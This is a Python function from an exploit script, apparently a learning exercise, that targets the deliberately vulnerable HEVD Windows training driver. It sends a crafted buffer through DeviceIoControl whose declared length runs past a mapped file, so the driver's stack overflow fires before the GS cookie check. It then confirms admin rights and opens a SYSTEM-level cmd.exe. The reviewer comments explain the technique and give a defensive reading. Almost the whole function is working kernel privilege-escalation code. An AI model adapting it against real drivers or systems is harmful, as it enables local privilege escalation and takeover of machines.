def trigger_stack_overflow_GS():
    """Send the prepared buffer to the HEVD device and report the outcome.

    HackSysExtremeVulnerableDriver (HEVD) is an intentionally vulnerable
    training driver. The function opens its device object, issues a single
    DeviceIoControl request using the buffer from create_map_file(), and
    then uses shell.IsUserAnAdmin() as its only success signal.

    Exits the process via sys.exit() when the device cannot be opened.
    Returns None otherwise.

    NOTE(review): the DeviceIoControl return value is never inspected and
    the device handle is never closed; both are left as the author wrote
    them.
    """
    device_path = "\\\\.\\HackSysExtremeVulnerableDriver"
    desired_access = 0xC0000000  # GENERIC_READ | GENERIC_WRITE
    creation_disposition = 0x3   # OPEN_EXISTING: the driver must already be loaded
    # Presumably the IOCTL for HEVD's GS-protected stack overflow handler,
    # going by this function's name -- confirm against the driver source.
    ioctl_code = 0x222007

    bytes_returned = c_ulong()
    driver_handle = kernel32.CreateFileA(
        device_path, desired_access, 0, None, creation_disposition, 0, None
    )

    # CreateFileA signals failure with INVALID_HANDLE_VALUE (-1); a zero or
    # None handle is rejected as well.
    handle_is_bad = (driver_handle == -1) or (not driver_handle)
    if handle_is_bad:
        print("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit()

    buffer_ptr, buffer_size = create_map_file()
    print("[+] Sending malicious buffer")
    print("[+] Triggering vuln ..")

    # The declared input length is buffer_size + 4. Per the original author's
    # note, those last 4 bytes lie outside the mapped file, so the driver's
    # memcpy raises an exception on that region before the GS (stack cookie)
    # check is reached; the note says the GS check path bug-checks the box.
    # Defensive reading: the request length is caller-controlled, so the
    # driver side has to bound it against its own buffer size.
    request_length = buffer_size + 4
    kernel32.DeviceIoControl(
        driver_handle,
        ioctl_code,
        buffer_ptr,
        request_length,
        None,
        0,
        byref(bytes_returned),
        None,
    )

    # Admin membership of the current process is the only success check.
    if not shell.IsUserAnAdmin():
        print("[!] Exploit did not work. Re-run it!")
        return

    print("[*] Enjoy Elevated Privs !\r\n")
    os.system('cmd.exe')
HEVD_stackoverflowGS.py 文件源码